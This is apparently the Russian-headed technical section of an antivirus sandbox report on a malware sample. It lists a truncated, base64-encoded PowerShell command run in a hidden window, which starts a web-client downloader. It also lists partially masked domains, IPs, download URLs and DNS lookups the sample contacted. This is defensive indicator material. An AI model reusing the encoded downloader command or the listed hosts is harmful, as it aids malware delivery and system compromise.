Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABJADkANgA0ADAAXwBfAD0AKAAnAFEAJwArACcAOQAxAF8AJwArACcAXwA1ACcAKQA7ACQAYgBfADAAXwA3ADAAPQBuAGUAdwAtAG8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAUAA3ADYANgAxAF8AXwA9ACgAJwBoAH...
- 'da#####d-network.com':80
- 'da#####d-network.com':443
- '12#.#99.68.28':80
- 'he####wikitw.com':80
- 'he####wikitw.com':443
- 'he#####ook.urinfotw.com':443
- 'mb####gezoeken.nl':80
- '19#.#3.199.16':80
- '20#.#89.45.178':80
- http://da#####d-network.com/0yhPaoFo
- http://12#.#99.68.28/NUipKSNdX
- http://he####wikitw.com/NUipKSNdX
- 'da#####d-network.com':443
- 'he####wikitw.com':443
- 'he#####ook.urinfotw.com':443
- DNS ASK da#####d-network.com
- DNS ASK he####wikitw.com
- DNS ASK he#####ook.urinfotw.com
- DNS ASK mb####gezoeken.nl
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABJADkANgA0ADAAXwBfAD0AKAAnAFEAJwArACcAOQAxAF8AJwArACcAXwA1ACcAKQA7ACQAYgBfADAAXwA3ADAAPQBuAGUAdwAtAG8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAUAA3ADYANgAxAF8AXwA9ACgAJwBoAH...' (со скрытым окном)